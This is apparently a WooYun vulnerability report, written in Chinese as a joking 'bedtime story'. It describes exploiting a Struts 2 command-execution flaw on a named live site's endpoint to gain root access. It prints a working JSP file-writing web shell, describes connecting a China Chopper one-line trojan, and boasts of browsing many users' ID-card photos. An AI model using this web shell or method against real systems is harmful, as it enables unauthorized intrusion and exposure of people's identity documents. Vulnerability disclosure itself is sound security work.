WooYun.org

今天晚上我们来个睡前小故事：
某日碰见了这样一个点：http://www.ejbang.com/weixin/demo/tocreatedemocleanorder.do
随手友情测试后发现——泥煤，structs 2命令执行...
并且直接是root权限，有图有真相：

既然可以命令执行，那么接下来get一下shell（嗯，好像有点坏）。
脚本代码：

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

继续写入一句话...
然后就这样没有一点点防备地shell了~
shell之后我们拿出早已磨好的菜刀，开始连上我们上的mu~ma

爷第一次上马，有点小忐忑，来点掌声鼓励一下可好？
随手翻了翻，我了个去，为何这么多身份证照片...大半夜看得我有点害怕（不要问我为什么怕TAT），这里就甩一两张好了，生来不会打码，看看就好

好了，故事讲完了，好像该睡觉了的说。